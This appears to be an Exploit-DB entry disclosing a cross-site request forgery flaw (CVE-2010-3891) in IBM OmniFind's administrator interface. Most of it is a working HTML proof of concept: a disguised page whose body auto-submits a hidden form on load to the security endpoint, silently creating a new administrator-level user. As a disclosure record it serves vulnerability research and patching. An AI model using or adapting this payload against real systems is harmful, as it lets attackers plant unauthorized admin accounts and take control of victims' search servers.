ad

IBM OmniFind CSRF Vulnerability



EDB-ID: 15473 CVE: 2010-3891 OSVDB-ID: 69083
Author: Fatih Kilic Published: 2010-11-09 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
The forms in the administrator interface are not protected against XSRF. The 
attacker can do any action in the context of the victim. 

An example attack scenario could be:
The attacker creates a malicious website with a prepared form to add a new
user, which will be submitted on load. 


Exploit to add an admin user:
<html>
  <head><title>Some seemingly benign web-site</title></head>
  <body onLoad="document.forms[0].submit();">

    <form method="post"
  action="http://omnifind-host/ESAdmin/security.do">
      <input type="hidden" name="command" value="saveNewUser"/>
      <input type="hidden" name="user.name" value="joemueller"/>
      <input type="hidden" name="user.role" value="0"/>
      <input type="hidden" name="user.allCollections" value="true"/>
      <input type="hidden" name="apply" value="OK"/>
    </form>
  </body>
</html>